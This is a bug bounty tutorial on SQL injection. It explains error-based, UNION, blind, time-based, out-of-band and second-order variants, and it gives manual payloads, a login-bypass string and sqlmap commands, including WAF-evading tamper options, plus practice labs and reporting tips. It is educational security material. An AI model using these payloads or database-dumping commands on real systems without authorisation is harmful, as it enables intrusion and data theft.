What is SQL injection, what are its types and how to find it in a bug bounty? This complete guide covers everything from Error-Based, Blind, Time-Based SQLi, SQLmap, Burp Suite, and real-world examples.
What is SQL Injection?
If you want to get serious about bug bounty SQL Injection often referred to as SQLi should be your top priority. Its not just an old technique that no longer works. Even in 2026 its ranked number 3 on the OWASP Top 10 list and the high and critical severity reports related to this vulnerability are being submitted to bug bounty programs daily. Companies pay thousands of dollars for just one SQLi vulnerability and one researcher earned $2,000 for just one SQL injection bug.
SQL stands for Structured Query Language. Whenever you log in to a website and search for something, or fill out a form, there a database working behind the scenes and storing and retrieving the data using SQL. For example, a simple login query might look something like this:
SELECT * FROM users WHERE username = ‘ali’ AND password = ‘1234’;
This query is asking the database to find a user with the username ali and password 1234. Now,if the developer has not secured this query properly and the attacker can inject his own SQL code into this query and the database starts doing what the attacker wants and not the developer.
Why is SQL Injection So Dangerous?
With just one successful SQLi vulnerability an attacker can dump the entire database bypass login without password, delete or modify data and in some cases even run operating system level commands. As a real-world example in 2019, SQLi was found in the search bar of an e-commerce website due to which the credit card details and personal data of 4 million users were leaked overnight. This is the reason why companies take this vulnerability very seriously and offer huge bounties.
Types of SQL Injection
SQL isn’t just one type to find it effectively and you’ll need to understand the different types.
1. Error-Based SQL Injection
This is the simplest and easiest type. In this the application displays database errors directly on the screen. When you type single quote ( ‘ ) and get a MySQL or MSSQL error like You have an error in your SQL syntax then understand that you are at the right place. This error can tell you the database name, version and even the table structure. This is the fastest type of bug bounty to receive and confirm.
2. UNION-Based SQL Injection
In this, the attacker uses the UNION operator of SQL to extract data from different tables. For example, if the original query is fetching data from the products table and then the attacker can extract data from the users table along with it through UNION. But for this the number of columns and their data types must match exactly, otherwise the query will not work. This requires some practice but is a very powerful technique.
3. Boolean-Based Blind SQL Injection
It is useful when the application does not show any error but there is a difference in the response to the request. For example, if you write AND 1=1 then the page comes up normally but on AND 1=2 the page is blank or some different message comes up. This means that the application is processing the SQL condition and the response is getting changed and this is a clear sign of SQL injection. In this technique you can extract data from the database character by character by asking yes/no questions.
4. Time-Based Blind SQL Injection
This is the stealthiest technique. There is no error in this no visible difference in the response, but you send a payload from the database which stops the server for a few seconds. If the response is delayed by 5 seconds after sending the payload SLEEP(5) and then it is confirmed that it is SQL injection. This technique is found a lot in production systems because developers hide errors, but cannot stop the timing. Recently a real bug bounty writeup published on infosecwriteups showed how time based blind SQLi was found in a newsletter form in which different timing was compared for each character.
5. Out-of-Band SQL Injection
This is the most advanced type. In this the database itself sends the request to an external server and such as a DNS or HTTP call. This is useful when there are no errors or timing issues. Burp Suite Collaborator or an Interact tool is used for this. This is not common, but where it is found, its impact is significant.
6. Second-Order SQL Injection
There is another tricky type that many hunters miss. In this case the malicious input is first safely stored in the database but the later injected when used in another query. It can be found in registration forms, profile update pages or saved searches.
Identify SQL Injection Vulnerabilities in Bug Bounty Targets
SQLi isn’t found everywhere but there are some specific places where its found in abundance. Login forms are the most common target. Test both username and password fields. Search bars and filters also often contain SQLi because developers build search functionality quickly.
URL parameters like ?id=1, ?category=shoes, ?page=2 also need to be tested. Don’t Ignore order by fields, sorting dropdowns and hidden form fields. API endpoints that accept data in JSON should also be tested for SQLi. Very few people test in this area, hence, they generate more bounties.
Perform Manual SQL Injection Testing
It’s important to learn to test manually before using automated tools this is what separates expert hunters from beginners. The first step is to launch Burp Suite and set up a proxy in your browser and browse to the target website. Every request will be intercepted. Now send the parameters you want to test to Burp Repeater.
Try these simple payloads first:
Single quote: ‘ This triggers an error if not properly sanitized.
Double quote: ” Some databases use double quotes.
Comment sequences: –, #, /* These comment out the rest of the SQL query.
Time delay: ‘ OR SLEEP(5) — for MySQL.
If you are testing whether a login can be bypassed and type ‘admin’ in the username field and anything in the password. This query becomes:
SELECT * FROM users WHERE username = ‘admin’–‘ AND password = ”
Everything after the double dash is commented out, so the password is not checked and you can log in as an admin if the web app is vulnerable.
SQLmap : Advanced Automation Tool for SQL Injection Testing
SQLmap is an open-source tool that automates SQL injection detection and exploitation. But be careful to only run SQLmap on targets within the bug bounty scope and not on any other site without permission.The basic commands are something like this:
sqlmap -u “https://target.com/page?id=1” –dbs
This command will test the id parameter and if it is successful will display a list of databases.And if yuh bypass the WAF use this command.
sqlmap -u “https://target.com/page?id=1” –tamper=space2comment,between –random-agent –level=3 –risk=2 –dbs
–level and –risk increase attempts more payloads. –random-agent uses a different browser identity each time. –tamper scripts confuse the WAF.
But always remember that SQLmap is an automated tool. It can miss context-based injections that are only found through manual testing. In a real writeup a researcher reported that Target had a double quote injection that SQLmap failed on but manual testing caught it and resulted in a $2,000 bounty.
SQL Injection Testing with Burp Suite & Safe Practice Platforms
Burp Suite’s Intruder and Repeater are both useful for SQL injection testing. First send the target request to the Repeater and manually change the payloads as this gives precise control. If you want an automated scan, use Burp Scanner which can detect Boolean-based, time-based, UNION-based, and out-of-band SQL injections.
A useful trick in Burp Suite is to look at the timing of the response. If the response normally comes in 200ms after sending a time-based payload but comes in 5200ms after sending a SLEEP payload and then this is a clear indication.
It is illegal to test real websites without permission. So practice on these free platforms. PortSwigger Web Security Academy is completely free and has dedicated labs for SQL injection which are also used by professional pentesters. DVWA i.e. Damn Vulnerable Web Application is a locally running vulnerable website and can be easily set up with Docker. SQL injection machines are also available on HackTheBox and TryHackMe. OWASP WebGoat is also a good option for beginners.
How to Write a Professional Bug Bounty Report
A good bug report decides whether you will get a bounty or not. The report must contain the vulnerable URL and exact parameters, step-by-step reproduction steps that anyone can follow, a clear PoC (Proof of Concept) to confirm that the vulnerability is real, what will be the impact if the attacker exploits it, and a suggested CVSS score.
One thing is very important don’t expose real user data in the PoC. Just prove that the vulnerability exists. For example, confirm it’s SQLi with a time delay and take a screenshot. Don’t try to exploit it too much.
Final Thoughts
SQL Injection is a living and breathing vulnerability even in 2026. its not just found in legacy systems, its also found in modern applications because a developer overlooked an endpoint, or some old piece of legacy code hasn’t been updated. In bug bounties, it consistently rates at high and critical severity and meaning more bounties and more recognition. Take it seriously, solve labs on PortSwigger Academy, and keep writing writeups on your blog. This is the way to become a successful bug bounty hunter.
